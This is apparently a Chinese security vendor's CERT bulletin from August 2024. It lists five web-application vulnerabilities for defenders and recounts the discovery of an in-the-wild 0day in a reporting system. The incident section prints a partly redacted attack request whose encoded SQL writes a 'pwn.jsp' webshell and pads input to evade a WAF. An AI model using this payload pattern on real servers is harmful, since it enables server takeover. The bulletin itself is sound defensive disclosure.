【8/2特辑】今日热点漏洞速速自查!
【8/2特辑】今日热点漏洞速速自查!
安恒研究院 安恒信息CERT 2024-08-02 20:27
|
漏洞导览 |
|
|
· EKing-管理易存在任意文件上传漏洞 |
|
|
· EKing-管理易存在任意文件上传漏洞 |
|
|
· 金和OA存在任意用户添加漏洞 |
|
|
· 九思OA存在任意文件上传漏洞 |
|
|
· 方正全媒体采编系统存在任意文件读取漏洞 |
漏洞概况
在当前网络攻防演练中,
安恒信息
CERT正紧密关注近期曝光的安全漏洞,持续进行监测和深入梳理。我们将对监测到的每一个漏洞进行深入分析和评估,为蓝队(防守方)输出漏洞清单。这份清单旨在帮助蓝队在攻防演练期间进行自检,并采取必要的措施来强化防护。
1、EKing-管理易存在任意文件上传漏洞(安恒CERT编号:WM-202408-000008)
漏洞详情:
EKing-管理易某接口处存在文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
产品支持情况:
AiLPHA大数据平台、APT攻击预警平台、明鉴漏洞扫描系统、WAF、玄武盾已支持
2、EKing-管理易存在任意文件上传漏洞(安恒CERT编号:WM-202408-000009)
漏洞详情:
EKing-管理易某接口处存在文件上传漏洞,未经身份验证的远程攻击者可利用此漏洞上传任意文件,在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
产品支持情况:
AiLPHA大数据平台、APT攻击预警平台、明鉴漏洞扫描系统、WAF、玄武盾已支持
3、金和OA存在任意用户添加漏洞(安恒CERT编号:WM-202408-000011)
漏洞详情:
攻击者可以构造恶意数据包来添加任意用户,最终越权登录账号并可能进一步实现远程代码执行。
产品支持情况:
明鉴漏洞扫描系统已支持
4、九思OA存在任意文件上传漏洞(安恒CERT编号:WM-202408-000014)
漏洞详情:
攻击者能够上传恶意文件至服务器,从而执行任意代码或篡改网站内容。
产品支持情况:
AiLPHA大数据平台、APT攻击预警平台、明鉴漏洞扫描系统、WAF、玄武盾已支持
5、方正全媒体采编系统任意文件读取漏洞(安恒CERT编号:WM-202408-000015)
漏洞详情:
攻击者可以利用该漏洞读取服务器上存储的敏感信息,可能利用漏洞进一步渗透系统。
产品支持情况:
AiLPHA大数据平台、APT攻击预警平台、明鉴漏洞扫描系统、WAF、玄武盾已支持
恒脑x漏洞分析
攻防演练正在如火如荼地进行着。所有参与者们紧张而专注,仿佛整个战场都笼罩在紧张的氛围中。突然间,前方传来了一则关键情报:似乎已经捕获到了某个系统的高危漏洞!这个消息迅速传遍演练现场,激起了一阵骚动和好奇。
漏洞的样本迅速被传送到了安恒研究院,专家们开始了紧张而密集的分析工作。经过一番深入研究后,他们的猜测得到了证实:这是一个
在野0day漏洞。
那么,这个漏洞是如何被捕获到的呢?接下来,让我们一起来揭开这个谜团的真相。
事件回溯
当日,一线同事突然发现了异常的攻击流量,经过
恒脑x态感平台
的检索,
现有的规则无法完全匹配到这种流量的信息,确定这是外部攻击者利用web漏洞展开的攻击。
面对这一情况,一线同事迅速采取行动,立即提取了相关的攻击流量,并借助
恒脑智能体
进行进一步深入的分析和评估。
这些流量的细节如下:
请求报文
GET /webroot/decision/xxxx/xxxxxxServer?test=<超长字符串>&n=<混淆代码>${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%61%74%74%61%63%68%0c%64%61%74%61%62%61%73%65%20%27%2e%2e%2f%77%65%62%61%70%70%73%2f%77%65%62%72%6f%6f%74%2f%70%77%6e%2e%6a%73%70%27%20%61%73%20%27%74%31%36%32%36%35%39%34%27%3b'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%63%72%65%61%74%65%0C%74%61%62%6C%65%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%20%74%65%78%74%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('<混淆代码>'),1,1)} HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
响应报文
HTTP/1.1 302
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: object-src 'self'
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: /webroot/decision/xxxx/xxxxxxServer?test=<超长字符串>&n=truetruetrue
Content-Length: 0
Date: Tue, 23 Jul 2024 07:54:02 GMT
Connection: close
可以观察
到,该请求包利用了超长字符填充尝试绕过WAF,并且包含了一段经过混淆的payload。现在的
问题是,
恒脑智能体
是否能够成功解析出其中的内容?
恒脑智能体
通过分点论述的方法清晰地解释了问题,并提供了临时的漏洞解决方案。随后,通过
恒脑x策
略库快速检索了该漏洞的利用情况,结果显示这是一个未知的web漏洞。
面对这一发现,一线同事立刻将漏洞信息上传至云端,交由安恒研究院进一步深入分析。最终确认,该漏洞是影响国产某知名报表系统的在野0day漏洞,并迅速制定了产品漏洞解决方案,以便快速响应。
在实际的攻防场景中,恒脑通过持续采集前端流量,并结合24小时不间断的自动分析和实时矫偏技术,能够及时发现并响应漏洞威胁,从而确保网络安全高效运转。无论是面对传统漏洞还是全新的未知威胁,恒脑展现出了卓越的应变能力和防御效果。
关于我们
安恒信息应急响应中心(CERT)是专注于对全网重要网络安全漏洞、安全事件等威胁情报进行实时主动发现、快速预警、联动响应的安全应急协调中心。
中心成员由丰富攻防经验的资深安全技术专家组成,联动安恒威胁情报中心,共同针对最新威胁情报主动发现,重大安全漏洞和安全事件进行深度挖掘、分析、溯源,并结合自主研发的网络空间测绘系统-「全球网络空间超级雷达」梳理全网受影响程度。
第一时间通过多渠道对客户进行安全预警通知,并向国家有关部门通报,同时在有关部门的指导下,对影响面极广的漏洞对外发布安全预警和应急措施建议,为安全中国,营造健康、安全的数字化经济环境助力。
如有漏洞相关需求支持请联系400-6059-110获取相关能力支撑。
往/期/回/顾